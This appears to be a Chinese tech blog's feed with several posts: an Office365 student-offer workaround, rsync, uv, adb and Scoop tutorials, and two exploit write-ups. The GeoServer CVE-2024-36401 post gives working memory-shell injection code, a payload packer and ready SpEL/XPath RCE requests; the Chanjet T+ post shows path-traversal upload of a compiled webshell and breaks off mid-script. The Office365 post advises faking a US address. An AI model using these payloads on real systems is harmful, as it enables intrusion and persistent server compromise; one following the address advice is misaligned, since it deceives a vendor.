OopsUnix It's a long and beautiful life. 2026-03-31T16:27:17.264Z en https://oopsunix.com// OopsUnix https://oopsunix.com/ Astro Litos Theme Copyright © 2026 OopsUnix Office365教育优惠五年领取 https://oopsunix.com//posts/microsoft-365-student 2026-01-21T00:00:00.000Z 2026-01-21T00:00:00.000Z OopsUnix Office365教育优惠五年领取

所需资料:

  • 美区节点
  • 境外银行卡(Visa、万事达)
  • Google 账户
  • 教育邮箱

前提

修改 Microsoft 账户国家为美国:https://account.microsoft.com/profile

提前在 Google Pay 中绑定银行卡:https://wallet.google.com/wallet/u/0/paymentmethods

流程

IMPORTANT

链接要按顺序点击,第一个过了再买第二个

链接一

访问:https://checkout.microsoft365.com/acquire/purchase?language=zh-TW&market=US&requestedDuration=Month&scenario=microsoft-365-student&client=poc&campaign=StudentFree12M

选择 Google Pay支付(必需,不然无法多领几年)

填写教育邮箱,并前往教育邮箱查看邮件

image-20260121163654188

点击邮件中的链接,如果出现这个错误,尝试重新打开链接,并刷新上面第一个链接

image-20260121135926361

此时,如果第一个链接的界面中的蓝色按钮变成“新增账单地址”,则表示验证通过了,

image-20260121140042158

使用美国地址生成,生成免税州地址【阿拉斯加州(Alaska)、特拉华州(Delaware)、蒙大拿州(Montana)、新罕布什尔州(New Hampshire)、俄勒冈州(Oregon)】

image-20260121140129226

填写地址,继续下一步,显示“已成功驗證您的學生狀態”,点击开始使用按钮

image-20260121140455350

点击“开始使用”按钮,等待调用 Google Pay 付款信息验证成功,

image-20260121141624803

链接二

打开链接:https://checkout.microsoft365.com/acquire/purchase?language=zh-TW&market=US&requestedDuration=Month&scenario=microsoft-365-premium&client=poc&campaign=StudentPremiumFree12M

如果打开失败,尝试重新访问链接image-20260121141756267

显示的是一个月,流程基本一样,重复之前的步骤即可

image-20260121142224740

点击“开始使用”,跳转到账户首页查看

image-20260121143142002]]> 使用 Rsync 实现服务器之间的高效文件同步 https://oopsunix.com//posts/rsync 2025-09-07T00:00:00.000Z 2025-09-07T00:00:00.000Z OopsUnix 使用 Rsync 实现服务器之间的高效文件同步 使用 Rsync 实现服务器之间的高效文件同步

Rsync是一款功能强大且多功能的文件复制工具,可让您同步本地和远程目录。它可用于在两台计算机之间复制文件和目录,或使同一台计算机上的两个目录保持同步。

Rsync 非常高效,因为它只传输自上次同步以来已更改的文件部分。这使得它非常适合同步包含大量经常更改的文件的大型目录。

  • 通过 SSH 同步目录,
  • 在传输过程中压缩数据,
  • 保留文件权限和时间戳,
  • 删除目标目录中源目录中不存在的文件。

Rsync 语法:

rsync [options] [source] [destination]

Rsync常用选项

  • -a (--archive):存档模式;此选项可确保保留符号链接、权限、时间戳和其他重要信息。
  • -v (--verbose):增加详细程度。
  • -r (--recursive):递归同步目录。
  • --delete:从目标中删除源中不存在的文件。如果您想要文件同步,则应该使用此选项。
  • -z (--compress):在传输过程中压缩数据。
  • -h (--人类可读):以人类可读的格式显示数字。
  • -P:结合--partial(保留部分传输的文件)和--progress(显示传输过程中的进度)。

确保两个服务器上都安装了 rysnc,并且对源目录和目标目录都具有必要的权限。

rsync -avzhP remoteuser@remote_host:/var/www/production_site/ /home/myuser/site_backup/

参考链接:

]]> uv -- Python 包与环境管理工具 https://oopsunix.com//posts/uv 2025-06-15T00:00:00.000Z 2025-06-15T00:00:00.000Z OopsUnix uv 是一个由 Astral 公司用 Rust 开发的高性能 Python 包管理工具,旨在提供比传统 pip 更快的包安装和依赖管理体验。 uv — Python 包与环境管理工具

uv 介绍

uv 是一个由 Astral 公司用 Rust 开发的高性能 Python 包管理工具,旨在提供比传统 pip 更快的包安装和依赖管理体验。

与传统的 Python 包管理工具相比,uv 具有以下显著优势:

  • 🚀 一体化工具:一个工具替代 pip、pip-tools、pipx、poetry、pyenv、twine、virtualenv 等多种工具
  • ⚡️ 极致速度:比 pip 快 10-100 倍
  • 🗂️ 全面项目管理:提供通用锁文件的综合项目管理功能
  • ❇️ 脚本运行:支持带有内联依赖元数据的脚本运行
  • 🐍 Python版本管理:安装和管理不同的 Python 版本
  • 💾 高效磁盘空间利用:通过全局缓存实现依赖去重
  • ⏬ 简易安装:无需 Rust 或 Python 环境,可通过 curl 或 pip 直接安装
  • 🖥️ 多平台支持:支持 macOS、Linux 和 Windows 系统

uv 安装

使用官方安装脚本(推荐)

# Linux/macOS
curl -LsSf https://astral.sh/uv/install.sh | sh

# Windows
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"

使用包管理器

Homebrew

# macOS (Homebrew)
brew install uv

WinGet

winget install --id=astral-sh.uv  -e

Scoop

scoop install main/uv

PyPI

pip install uv

安装完成后,可以通过以下命令验证安装是否成功:

uv --version

uv 安装 Python

如果系统中已安装 Python,uv 会自动检测并使用,无需额外配置。不过,uv 也能够安装和管理 Python 版本。同时 uv 会根据需要自动安装缺失的 Python 版本,因此你无需预先安装 Python 即可上手。

NOTE

Python 官方并未发布可分发的二进制文件。因此,uv 使用的是 Astral 的python-build-standalone 项目提供的发行版。更多详细信息,请参阅[Python 发行版](https://uv.doczh.com/concepts/python-versions/#受管理的 Python 发行版)文档。

IMPORTANT

uv 安装的 Python 不会全局可用(即无法通过 python 命令调用)。

安装最新版本的 Python:

uv python install

安装特定版本的 Python:

uv python install 3.12

安装多个 Python 版本:

uv python install 3.11 3.12

uv 运行 Python 项目

uv 使用 pyproject.toml 文件进行项目管理,这是现代 Python 项目的标准配置文件。

初始化项目

项目根目录下运行以下命令:

uv init --project .

这会创建基本的项目结构和 pyproject.toml 文件,并根据项目结构自动填充一些基本信息。

初始化虚拟环境

uv venv        # 在当前目录创建虚拟环境
uv venv .venv  # 在指定目录创建虚拟环境
NOTE

直接运行项目启动文件,例如: main.py 也会自动创建虚拟环境

激活虚拟环境

# Linux/macOS
source .venv/bin/activate

# Windows
.venv\Scripts\activate

添加依赖

使用 uv add 命令可以向项目添加依赖。该命令会自动更新 pyproject.toml 文件、锁文件和项目环境:

# 添加单个包
uv add requests

# 指定版本约束
uv add 'requests==2.31.0'

# 添加 Git 依赖
uv add git+https://github.com/psf/requests

# 从 requirements.txt 文件添加所有依赖
uv add -r requirements.txt

卸载依赖

使用 uv remove 命令可以删除项目依赖:

uv remove requests

升级依赖

使用 uv lock 命令配合 --upgrade-package 参数可以升级指定包:

# 升级特定包
uv lock --upgrade-package requests

运行项目命令

uv run 命令可以在项目环境中运行脚本或命令。在每次运行前,UV 会验证锁文件是否与 pyproject.toml 同步,并确保环境与锁文件一致:

# 运行 Python 脚本
uv run main.py

迁移现有的 Python 项目到 uv

初始化 pyproject.toml

使用 uv init 命令的 --bare 选项将仅创建 pyproject.toml,禁止创建额外文件,如 README.mdsrc/ 目录树、.python-version 文件等。

uv init --bare

添加项目依赖

  1. 如果项目中存在 requirements.txt 文件,可以使用以下命令安装所有依赖,并同步添加到pyproject.toml文件中:

    uv add -r requirements.txt

    uv 会自动解析 requirements.txt 文件,并将其中的依赖添加到 pyproject.tomldependencies 部分。

  2. 如果项目中存在 pyproject.toml 文件,可以使用以下命令使用现有的 pyproject.toml

    uv sync

uv 设置国内镜像源

uv 支持在项目、全局使用配置文件。

uv 会读取以下位置的配置文件(按优先级从高到低):

  • UV_CONFIG_FILE 环境变量指定的文件
  • ./uv.toml
  • ~/.uv/uv.toml
  • ~/.config/uv/uv.toml
CAUTION

若同时使用 pip 和 uv,镜像源需分别配置(uv 不读取 pip 的配置)

全局配置:

  • Linux & MacOS:

    mkdir ~/.config/uv && vim ~/.config/uv/uv.toml

  • Windows:

    %APPDATA%\uv\uv.toml

  • 在该文件中添加以下内容:

    [[index]]
url = "https://pypi.tuna.tsinghua.edu.cn/simple"
default = true

项目配置:

  • **文件路径:**项目目录下的 pyproject.toml

  • 在该文件中添加以下内容:

[[tool.uv.index]]
url = "https://pypi.tuna.tsinghua.edu.cn/simple"
default = true

常用国内镜像源

  • 清华大学:https://pypi.tuna.tsinghua.edu.cn/simple
  • 阿里云:https://mirrors.aliyun.com/pypi/simple/
  • 腾讯云:https://mirrors.cloud.tencent.com/pypi/simple
  • 华为云:https://repo.huaweicloud.com/repository/pypi/simple
]]> Android 14 通过 adb 保留数据降级软件 https://oopsunix.com//posts/android14-app-downgrade 2024-10-30T00:00:00.000Z 2024-10-30T00:00:00.000Z TLDRO 在高版本安卓中实现保留数据降级软件版本。 Android 14 通过 adb 保留数据降级软件

在高版本安卓中,通过adb install -d -r file.apk 似乎已经无法保留数据降级了,需要先保留数据卸载再重新安装旧版本安装包才能正常降级。

此方法理论上适用Android 14 ±任意几个版本

首先确保已经安装好platform-tools,将设备连接到电脑,打开一个cmd窗口:

  1. 保留数据卸载原版本:

    adb shell cmd package uninstall -k com.tencent.mm

    这里以微信com.tencent.mm为例,将其替换成你需要卸载的包名

  2. 重启设备 ==【重要】==

    adb reboot

  3. 重新安装旧版本安装包:

    adb install wechat.apk

    其中wechat.apk替换成需要安装的安装包路径

]]> GeoServer JDK 11-22 通杀内存马利用总结(CVE-2024-36401) https://oopsunix.com//posts/cve-2024-36401 2024-08-21T00:00:00.000Z 2024-08-21T00:00:00.000Z OopsUnix 前序

看到了Numen Cyber Labs发表的《CVE-2024-36401 JDK 11-22 通杀内存马》一文,通过SpEL表达式执行的方式完成JDK 11 - 22的全版本JDK内存马注入攻击,想着师傅思路都写得这么详细了,本地复现一下还不是有手就行,结果不出意外的失败了。

本文通过 SpEL 表达式执行的方式完成对GeoServer(CVE-2024-36401)漏洞下高版本JDK内存马注入攻击的利用,并对利用过程中进行总结。

SpEL 注入内存马

1. JMG生成内存马

首先利用JMG生成内存马注入代码,由于通过bin形式安装默认是Jetty,这里选择Jetty类型,注入器类名需要在org.springframework.expression下,这里定义个Test

image-20240821145018967

2. Bypass JDK16+ 反射限制

为了绕过JDK16+ 的反射限制,我们需要在内存马中添加反射绕过代码,可以选择修改JMG的代码实现,这里我们选择对 JMG 生成的字节码进行反编译,在反编译后的代码中添加反射绕过代码,并对后续需要压缩字符串长度的需求做准备。

在反编译后的代码中找到getListener方法,在byte[] clazzByte = gzipDecompress(decodeBase64(this.getBase64String()));这一行前添加如下反射绕过代码:

Class unsafeClass = Class.forName("sun.misc.Unsafe");
Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
unsafeField.setAccessible(true);
Unsafe unsafe = (Unsafe) unsafeField.get(null);
Module module = Object.class.getModule();
Class cls = HelpUtils.class;
long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
unsafe.getAndSetObject(cls, offset, module);

其中HelpUtils需要替换成当前类名,这里替换成Test

image-20240821150229256
  1. 编译生成gzip + Base64字节码

由于JMG 的 Payload 是直接使用 Base64 编码的,部分类型的内存马直接使用会因为字符串长度超过了 10,000,而触发SpEL expression is too long, exceeding the threshold of '10,000' characters异常,因此我们需要把字节码的字符串压缩到10,000以内,可以通过以下步骤进行:

(1). 手动编译恶意字节码

javac -g:none .\Test.java -Xlint:unchecked  -Xlint:deprecation

(2). gzip 压缩字节码后转换成 Base64 输出

这里提供一个java代码进行上述操作,需要修改的是代码中的javaFilePathjavacPath:

import java.io.*;
import java.util.Base64;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.GZIPOutputStream;

public class Evil {

    public static void main(String[] args) {
        // 内存马代码文件
        String javaFilePath = "Test.java";
        String classFilePath = getClassNameFromJavaPath(javaFilePath) + ".class";
        // 输出'gzip + Base64'的恶意字节码到文件
        String outputFilePath = "SpELMemShell.txt";

        try {
            // 编译 .java 文件
            compileJavaFile(javaFilePath);

            // 检查 .class 文件是否已生成
            if (!new File(classFilePath).exists()) {
                throw new FileNotFoundException("The compiled class file was not generated.");
            }

            // 压缩并编码 .class 文件
            String base64String = compressAndEncodeClassFile(classFilePath);

            // 写入文件
            writeToFile(outputFilePath, base64String);
        } catch (IOException e) {
            System.err.println("Error processing the file: " + e.getMessage());
        }
    }

    private static void compileJavaFile(String javaFilePath) throws IOException {
        // 内存马中的Object.class.getModule()方法是在Java 9及更高版本中引入的,因此需要指定使用Java 9+的javac进行编译
        String javacPath = "D:\\SDE\\Java\\jdk-11.0.21\\bin\\javac.exe";

        List<String> command = new ArrayList<>();
        command.add(javacPath); // 使用 javac 的完整路径
        command.add("-g:none");
        command.add("-Xlint:unchecked");
        command.add("-Xlint:deprecation");
        command.add(javaFilePath);

        ProcessBuilder processBuilder = new ProcessBuilder(command);
        Process process = processBuilder.start();

        // 等待编译完成
        try {
            int exitCode = process.waitFor();
            if (exitCode != 0) {
                BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
                String line;
                while ((line = errorReader.readLine()) != null) {
                    System.err.println(line);
                }
                throw new RuntimeException("Compilation failed with exit code " + exitCode);
            }
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            throw new IOException("Compilation interrupted", e);
        }
    }

    private static String compressAndEncodeClassFile(String classFilePath) throws IOException {
        byte[] classData = readFile(classFilePath);

        // 使用 gzip 进行压缩
        byte[] compressedData = compress(classData);

        // 将压缩后的数据转换为 Base64 编码
        String encodedCompressedData = Base64.getEncoder().encodeToString(compressedData);

        // 输出原始长度和新的 Base64 编码长度
        System.out.println("Original Base64 encoded string length: " + classData.length);
        System.out.println("New Base64 encoded string length after gzip compression: " + encodedCompressedData.length());

        return encodedCompressedData;
    }

    private static byte[] readFile(String filePath) throws IOException {
        try (FileInputStream fis = new FileInputStream(filePath)) {
            byte[] data = new byte[fis.available()];
            fis.read(data);
            return data;
        }
    }

    private static byte[] compress(byte[] data) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (GZIPOutputStream gzos = new GZIPOutputStream(baos)) {
            gzos.write(data);
        }
        return baos.toByteArray();
    }

    private static void writeToFile(String filePath, String content) throws IOException {
        try (BufferedWriter writer = new BufferedWriter(new FileWriter(filePath))) {
            writer.write(content);
        }
    }

    private static String getClassNameFromJavaPath(String javaFilePath) {
        String fileName = new File(javaFilePath).getName();
        return fileName.substring(0, fileName.indexOf('.'));
    }
}

4. 替换SpEL Payload

最后我们将字符串替换到 Payload 中gzip + Base64的位置

POST /geoserver/wfs HTTP/1.1
Host: 192.168.150.147:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.1 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 9160

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>toString(getValue(parseRaw(org.springframework.expression.spel.standard.SpelExpressionParser.new(),"T(org.springframework.cglib.core.ReflectUtils).defineClass('org.springframework.expression.Test',T(org.apache.commons.io.IOUtils).toByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(T(org.springframework.util.Base64Utils).decodeFromString('gzip + Base64')))),T(java.lang.Thread).currentThread().getContextClassLoader(),null,T(java.lang.Class).forName('org.springframework.expression.ExpressionParser'))")))
</wfs:valueReference>
</wfs:GetPropertyValue>

5. 发送报文,一键注入内存马

image-20240821160558209

其他POC

命令执行测试

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'calc')
</wfs:valueReference>
</wfs:GetPropertyValue>

DNSLog测试

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>java.net.InetAddress.getAllByName("xxx.dnslog.xxx")
</wfs:valueReference>
</wfs:GetPropertyValue>

基于时间的延迟测试

Payload(1):

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>java.lang.Thread.sleep(2000)
</wfs:valueReference>
</wfs:GetPropertyValue>

Payload(2):

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>
/+java.lang.T<!--IgnoreMe!!!!-->hread.s[(: IGNORE :)]leep
   <![CDATA[
(2000)
]]>
  </wfs:valueReference>
</wfs:GetPropertyValue>

SpEL命令执行

Payload(1):

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
    <wfs:valueReference>getValue(parseRaw(org.springframework.expression.spel.standard.SpelExpressionParser.new(),"T(java.lang.Runtime).getRuntime().exec('control')"))
</wfs:valueReference>
</wfs:GetPropertyValue>

Payload(2):

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>getValue(parseRaw(org.springframework.expression.spel.standard.SpelExpressionParser.new(),"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('Y2FsYw==')))"))
</wfs:valueReference>
</wfs:GetPropertyValue>

总结

本文是对Numen Cyber Labs师傅通过 SpEL 表达式执行的方式完成内存马注入攻击的一次利用总结,并对利用过程中发现的问题进行Payload完善,例如:

  • 打这个漏洞如果返回java.lang.ClassCastException是正常的,返回No such attribute就说明有问题了。
  • 原文中并没有给出最终的payload,在给出解决的 Payload 中:T(java.lang.Class).forName("org.springframework.expression.ExpressionParser")因为使用了"",在利用时会因为xpath格式校验而触发异常,所以需要注意单双引号的使用。
  • 最终的Payload添加对gzip + Base64处理的代码。

最后,再次感谢Numen Cyber Labs师傅提供的思路。

参考

]]> 不下载zip文件获取文件列表 https://oopsunix.com//posts/tips-zip-list 2024-08-15T00:00:00.000Z 2024-08-15T00:00:00.000Z OopsUnix 一个小Tip,可以在用来下载大文件zip压缩包之前,先知晓压缩包中的文件列表

zip文件的目录信息存储在文件的尾部,因此我们只需要下载最后面一点点内容就能看到里面都有些什么文件。

以vscode为例

  1. 先用cURL请求查看一下响应头
curl -I https://vscode.download.prss.microsoft.com/dbazure/download/stable/fee1edb8d6d72a0ddff41e5f71a671c23ed924b9/VSCode-win32-x64-1.92.2.zip

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 139516845
Cache-Control: public, max-age=86400
Content-Disposition: attachment; filename=VSCode-win32-x64-1.92.2.zip; filename*=UTF-8''VSCode-win32-x64-1.92.2.zip
Content-Type: application/octet-stream
Etag: "0x384303F8B4C49AFF47F905A745E5A4A7358E23744DCDE3FD92F66EA3C92B3687"
Last-Modified: Wed, 14 Aug 2024 19:06:24 GMT
X-Ms-ApiVersion: Distribute 1.2
X-Ms-Region: prod-weu-z1
Accept-Ranges: bytes
Date: Tue, 20 Aug 2024 14:18:59 GMT
Via: 1.1 varnish
Age: 59889
X-Served-By: cache-nrt-rjtf7700073-NRT
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1724163539.200758,VS0,VE1
X-CID: 3
X-CCC: JP

其中需要在响应头关注的内容:

  • accept-ranges: bytes 表示可以分段下载
  • content-length: 139516845 表示文件的大小
  1. 这里我们把文件大小数值-1000000,下载最后1M大小的内容,保存为vscode.zip
curl -H "Range: bytes=138516845-" https://vscode.download.prss.microsoft.com/dbazure/download/stable/fee1edb8d6d72a0ddff41e5f71a671c23ed924b9/VSCode-win32-x64-1.92.2.zip -o vscode.zip
  1. 最后使用zipinfo命令的-s参数查看文件列表
zipinfo -s vscode.zip

输出:

Archive:  vscode.zip
Zip file size: 1000000 bytes, number of entries: 1504
error [vscode.zip]:  missing 138516845 bytes in zipfile
  (attempting to process anyway)
drwx---     6.3 fat        0 bx stor 24-Aug-14 18:50 bin/
-rw-a--     6.3 fat     2001 bx defN 24-Aug-14 18:14 bin/code
-rwxa--     6.3 fat 20124728 bx defN 24-Aug-14 18:50 bin/code-tunnel.exe
-rwxa--     6.3 fat      178 bx defN 24-Aug-14 18:14 bin/code.cmd
-rw-a--     6.3 fat   150045 bx defN 24-Aug-14 18:14 chrome_100_percent.pak
-rw-a--     6.3 fat   225418 bx defN 24-Aug-14 18:14 chrome_200_percent.pak
-rwxa--     6.3 fat 167933360 bx defN 24-Aug-14 18:51 Code.exe
......
]]> 使用Scoop(Win­dows 命令行安装工具)实现安全工具安装及自动更新 https://oopsunix.com//posts/scoop 2024-04-10T00:00:00.000Z 2024-04-10T00:00:00.000Z OopsUnix Linux和MacOS都有包管理工具,如apt、brew,只需敲几个命令,就可以轻松实现软件的安装、更新、删除。但是在Windows安装、更新软件,是件相当繁琐和耗费时间的事情,效率太低,尤其是遇到不带自动更新的工具,每次都需要我们手动去下载。借助Scoop,可以像在Linux或macOS上使用apt或brew一样,轻松地下载和更新各种软件。

日常效果:

**安全工具一键更新:**使用scoop update *命令一键更新已安装的工具到最新版

image-20240920183252906

**BurpSuite 插件更新:**对应插件重新勾选一下就是最新版

image-20240920223557706

项目简介

Scoop 是是一个开源的Windows命令行包管理器,由JavaScript编写,并通过PowerShell脚本运行,类似于 De­bian 的 apt、ma­cOS 的 homebrew。虽然 Scoop 的作者在项目的 GitHub Wiki 中谈到, Scoop 只是一个安装工具(installer),不应该被称为包管理器(package manager)。但是对于使用者而言,它与我们一般认为的软件包管理工具其实很是相似。

官网:https://scoop.sh

环境要求

安装 Scoop

更改 powershell 脚本执行权限

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

在windows中默认不允许任何脚本运行,所以我们可以使用 **Set-ExecutionPolicy**来改变PowerShell运行环境,共有4种运行权限,如下所示:

  • Restricted——默认的设置,不允许任何script运行;
  • AllSigned——只能运行经过数字证书签名的script;
  • RemoteSigned——运行本地的script不需要数字签名,但是运行从网络上下载的script就必须要有数字签名(使用脚本安装scoop这一等级就行);
  • Unrestricted——允许所有的脚本运行;

典型安装

在非管理员的PowerShell中运行此命令,以默认配置安装scoop

irm get.scoop.sh | iex

如果你在访问GitHub时遇到网络问题,你可以使用代理,例如:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://gh.llkk.cc/https://raw.githubusercontent.com/scoopinstaller/install/master/install.ps1')

或者

Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://gitcode.com/gh_mirrors/inst/Install/blob/master/install.ps1')

Scoop 将默认把所有用户安装的 App 和 Scoop 本身置于C:\Users\<你的用户名>\scoop,如果需要自定义安装位置,请选择高级安装。

高级安装

如果你想高级安装。你可以下载安装程序,然后用参数手动执行它。

irm get.scoop.sh -outfile 'install.ps1'

如果你在访问GitHub时遇到网络问题,你可以使用代理,例如:

curl -o scoop_install.ps1 https://gh.llkk.cc/https://raw.githubusercontent.com/scoopinstaller/install/master/install.ps1

查看安装程序的所有可配置参数。

./scoop_install.ps1 -?

例如,将 scoop 安装到一个自定义目录(D:\Scoop),并在安装时使用代理

./scoop_install.ps1 -ScoopDir 'D:\Scoop' -Proxy 'http://127.0.0.1:7890'

设置全局代理安装

在国内访问github总是不成功,而且scoop的大部分包都在github,那么配置scoop的下载代理,将会极大的提高效率。

# 设置全局代理
scoop config proxy 127.0.0.1:7890

# 取消代理:
scoop config proxy None

# 先设置 PowerShell 允许执行未签名脚本
set-executionpolicy remotesigned -s currentuser

# 下载 Scoop 安装脚本进行安装
iex (new-object net.webclient).downloadstring('https://get.scoop.sh')

由于 Scoop 的安装脚本托管在 GitHub 的仓库里,所以对于无法正常访问 GitHub 的用户来说,安装的时候可能需要加一层全局代理后再进行安装。

基础使用

  • 查看命令列表:
scoop help
  • 搜索软件
scoop search <app>
  • 安装软件
scoop install <app>
  • 查看软件详细信息
scoop info <app>
  • 卸载软件
scoop uninstall <app>
  • 一次性卸载多个软件
scoop uninstall <app> <app>
  • 更新 scoop 本体和软件列表
scoop update
  • 更新指定软件
scoop update <app>
  • 更新所有已安装的软件
scoop update *
  • 查看已安装的程序
scoop list
  • 查看哪些程序可以升级
scoop status

更多详情请官网安装说明书: ScoopInstaller

进阶使用

bucket

所有的包管理器都会有相应的软件仓库 ,Scoop 管理存放软件包描述文件的地方叫做桶(Bucket),桶里面就是一个个 json 格式的软件包描述文件,类似Homebrew 的 Tap,关于桶的详细概念可以查看一下 Scoop 的 Wiki 页。

Scoop 默认软件仓库(main bucket)软件数量是有限的,但是可以添加第三方 bucket。

安装scoop-security

scoop-security 是用于 Scoop 的软件仓库,本项目旨在提供用于Windows平台渗透测试和网络安全相关工具的快捷安装、管理和自动更新。

确保你已经有 Scoop 环境后,执行以下命令订阅本软件仓库:

//scoop bucket add <仓库别名> <仓库地址>

scoop bucket add sec https://github.com/whoopscs/scoop-security
  • 查找软件
scoop search sec/nuclei
//或者
scoop search nuclei
  • 安装本仓库中的软件:
scoop install sec/nuclei
//或者
scoop install nuclei

大多数情况下,是可以省略仓库别名 sec/,只需要执行类似 scoop install nuclei 的命令,除非安装的多个仓库都有此软件,则需要指定安装来源仓库。

软件自动更新

本仓库已经添加 github ci 自动化,每隔几个小时会自动更新所有软件到最新版本

软件环境变量

Scoop 默认不会污染用户的 PATH 环境变量(除非软件包有修改环境变量的定义),而是使用垫片(shims)来进行统一管理调用执行文件。

更多信息请查看 官方文档

]]> 畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632) https://oopsunix.com//posts/cnvd-2022-60632 2022-09-14T00:00:00.000Z 2022-09-14T00:00:00.000Z OopsUnix 一、环境安装

https://www.chanjetvip.com/product/goods/download-list?id=53aaa40295d458e44f5d3ce5

选择17.0

https://dad.chanapp.chanjet.com/TplusYZHJ17.0.zip

建议选择迅雷下载。解压后选择标准版安装

安全软件需关闭

过程中需要配置MSSQL 数据库的。不设置即可

二、漏洞分析

三、漏洞复现

漏洞信息:

  • 漏洞编号:CNVD-2022-60632
  • 适用版本:<=v17.0
  • 漏洞类型:任意文件上传
  • 漏洞危害:可实现RCE获取主机权限
  • 涉及接口:/tplus/SM/SetupAccount/Upload.aspx?preload=1

漏洞利用

1、预编译aspx文件

使用Microsoft.NET的aspnet_compiler.exe预编译webshell文件

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe -v / -p "E:\学习ing\2022\vul\畅捷通 T+任意文件上传漏洞\b1" "E:\学习ing\2022\vul\畅捷通 T+任意文件上传漏洞\b2" -fixednames

-p 代表webshell的目录。 C:\Users\administrator\Desktop\2 代表预编译文件保存目录。(不可为同一目录)

以冰蝎webshell的aspx文件为例,复制到1文件夹下,执行上述命令,即可在2文件夹bin目录下看到:

image-20220914231920957

2、compiled文件上传

POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: 192.168.199.134
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=gvigofzulthd2v1i2q5zndtf; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1662302093; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1662302093
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Length: 504

------WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Disposition: form-data; name="File1";filename="../../../bin/load.aspx.cdcab7d2.compiled"
Content-Type: image/jpeg

<?xml version="1.0" encoding="utf-8"?>
<preserve resultType="3" virtualPath="/load.aspx" hash="62838a9aa" filehash="1eb3b21218d7" flags="110000" assembly="App_Web_load.aspx.cdcab7d2" type="ASP.load_aspx">
    <filedeps>
        <filedep name="/load.aspx" />
    </filedeps>
</preserve>
------WebKitFormBoundarywwk2ReqGTj7lNYlt--

使用burpsuite抓包重放如下请求

image-20220914232446588

3、dll文件上传

方法一:Python上传

这里需使用 Python 模拟 multipart/form-data 请求,Python代码如下

# coding: utf-8
import requests
import re

def upload_dll():
    files = {
             'File1': ('../../../bin/App_Web_load.aspx.cdcab7d2.dll', open('C:\\Users\\administrator\\Desktop\\2\\bin\\App_Web_load.aspx.cdcab7d2.dll', 'rb'), 'image/jpeg')
             }
    response = requests.post(url=upload_url, headers=headers, files=files)
    print(response.text)
    if response.status_code == 200 and re.search('无标题页', response.text) != None:
        check_url = 'http://192.168.199.134/tplus/load.aspx?preload=1'
        check_res = requests.get(url=check_url, headers=headers)
        print(re.search('错误信息(.*)(?=堆栈是)', check_res).group())

if __name__ == '__main__':
    # 上传链接
    upload_url = 'http://192.168.199.134/tplus/SM/SetupAccount/Upload.aspx?preload=1'
    # 请求头
    headers = {
